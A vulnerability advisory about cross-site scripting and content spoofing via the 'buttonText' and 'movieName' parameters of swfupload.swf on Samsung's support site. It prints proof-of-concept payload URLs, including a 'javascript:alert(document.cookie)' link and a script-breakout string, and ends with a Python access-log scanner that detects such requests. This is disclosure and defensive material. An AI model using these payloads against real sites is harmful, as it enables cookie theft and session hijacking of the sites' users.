Cross Site Scripting in Samsung Official Support Website

#Title: Cross Site Scripting in Samsung Official Support Website

Vector of operation: Remote
Impact: Cross Site Scripting & Content Spoofing


The vulnerability is caused by insufficient input validation of the parameters
“movieName” and "buttonText" passed to the script swfupload.swf “ ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
the context of an affected site.

There are two vulnerabilities in Samsung Official Support Website.

*Content Spoofing

http://[victim]/include/SWF/swfupload.swf?buttonText=test<img src=''>

It's possible to inject text, images and HTML (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/include/SWF/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click Me</a>

The code executes only after the user clicks the link, so this is strictly social XSS.

*Proof of Concept Code

http://[victim]/include/SWF/swfupload.swf?buttonText=test<img src=''>

*Live Preview

"]);}catch(e){}if(!self.a)self.a=!alert("xss");//<a href='javascript:alert(document.cookie)'>Click me</a>

On the server side, you can upgrade to a non-vulnerable version. On the client,
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.
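
Until the component is upgraded, requests that abuse the two parameters can be spotted in the web server's access log. The following is an added example, not part of the original advisory: it scans combined-format log lines for requests to swfupload.swf whose "movieName" or "buttonText" values break an assumed policy (identifier-only movieName, markup-free buttonText). The function names, the policy and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumed policy, not taken from the advisory: movieName is a plain
# identifier, buttonText is a label without markup or script URLs.
CHECKS = {
    "moviename": lambda v: re.fullmatch(r"\w*", v, re.ASCII) is None,
    "buttontext": lambda v: re.search(r"[<>]|javascript\s*:", v, re.I) is not None,
}

def flag_request(target):
    """Return the sorted names of parameters that violate the policy."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/swfupload.swf"):
        return []
    hits = set()
    # parse_qsl percent-decodes each value once before it is checked.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        check = CHECKS.get(name.lower())
        if check and check(value):
            hits.add(name.lower())
    return sorted(hits)

def scan(lines):
    """Return [(line_number, flagged_params)] for suspicious entries."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            params = flag_request(match.group(1))
            if params:
                findings.append((number, params))
    return findings

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /include/SWF/swfupload.swf?movieName=SWFUpload_0&buttonText=Upload HTTP/1.1" 200 1234',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /include/SWF/swfupload.swf?buttonText=test%3Cimg%20src%3D%27%27%3E HTTP/1.1" 200 1234',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /include/SWF/swfupload.swf?movieName=%22%5D%29%3B%7Dcatch%28e%29%7B%7D HTTP/1.1" 200 1234',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html?buttonText=%3Cb%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious {', '.join(params)}")
```
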
